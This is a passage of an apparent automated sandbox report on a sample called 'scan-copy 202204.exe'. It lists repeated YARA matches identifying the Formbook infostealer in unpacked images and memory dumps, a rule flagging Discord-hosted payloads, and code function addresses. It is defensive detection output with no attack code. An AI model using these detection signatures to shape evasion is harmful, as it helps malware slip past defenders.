            Source: Yara matchFile source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: scan-copy 202204.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: scan-copy 202204.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.860000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 15.0.scan-copy 202204.exe.860000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 15.0.scan-copy 202204.exe.860000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 18.2.msdt.exe.524796c.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 15.2.scan-copy 202204.exe.860000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.860000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.860000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.860000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 0.2.scan-copy 202204.exe.cc0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 18.2.msdt.exe.d26668.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.0.scan-copy 202204.exe.cc0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
            Source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 0_2_00CC22A8
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 0_2_013EC284
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 0_2_013EE650
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 0_2_013EE640
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 0_2_00CC2050
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00401028
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00401030
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041B8D6
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041C097
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041C976
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041C10D
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0040120A
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041D20E
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041C477
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00408C8C
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00408C90
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00402D87
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00402D90
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041C60E
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00402FB0
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_008622A8
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01344120
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132F900
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E1002
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013520A0
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F20A8
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133B090
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F28EC
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F2B28
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135EBB0
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EDBD2
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F22AE
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01320D20
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F2D07
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F1D55
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352581
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133D5E0
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F25DD
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133841F
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013ED466
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F1FF1
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01346E30
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013ED616
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F2EF7
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00862050
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFD466
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4841F
